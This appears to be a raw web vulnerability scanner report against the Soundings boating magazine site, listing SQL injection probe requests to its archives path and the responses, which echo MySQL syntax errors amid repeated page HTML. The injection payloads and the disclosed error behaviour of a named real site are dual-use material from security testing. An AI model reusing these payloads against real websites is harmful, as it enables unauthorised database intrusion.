Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/index.php" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>On Sailboats with Dieter Loibner</title> <link href="/boat-shop/on-sailboats/98?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/on-sailboats/98?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_on_sailboats"><!--
Type of page: category<br />Section: 16, s_uncategorized<br />Category: 98, c_uncategorized<br />Menu: 95, m_on_sailboats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li>..
- /archives/'+%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))%20FROM%20syscolumns)%20+'

/archives/'+%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))%20FROM%20syscolumns)%20+'

http://www.soundingsonline.com/archives/'+%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(5..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'+%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))%20FROM%20syscolumns)%20+'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:08 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20(select%20convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/archives/' (select convert(int,CHAR(95) CHAR(33) CHAR(64) CHAR(50) CHAR(100) CHAR(105) CHAR(108) CHAR(101) CHAR(109) CHAR(109) CHAR(97)) FROM syscolumns) '" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Archives and Archived Stories from Past Issues of Soundings Magazine</title> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" />

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_uncategorized c_uncategorized m_archives"><!--
Type of page: search<br />Section: , s_uncategorized<br />Category: , c_uncategorized<br />Menu: 60, m_archives-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span></a></li><li class="item202"><a href="/subscription-services/subscribe-to-e-newsletter"><span>E-Newsletter Sign-up</span></a></li></ul></li><li class="parent item80"><a href="#"><span>More</span></a><ul><li class="item110"><a href="/advertise"><span>Advertise</span></a></li><li class="item122"><a href="/more/the-masters-series"><span>The Master's Series<..
- /archives/'+%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))%20+'

/archives/'+%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))%20+'

http://www.soundingsonline.com/archives/'+%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(1..

Parameters

Parameter Type Value
ordering GET
searchphrase GET all

Request

GET /archives/'+%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)))%20+'?ordering=&searchphrase=all HTTP/1.1
Referer: http://www.soundingsonline.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%20convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
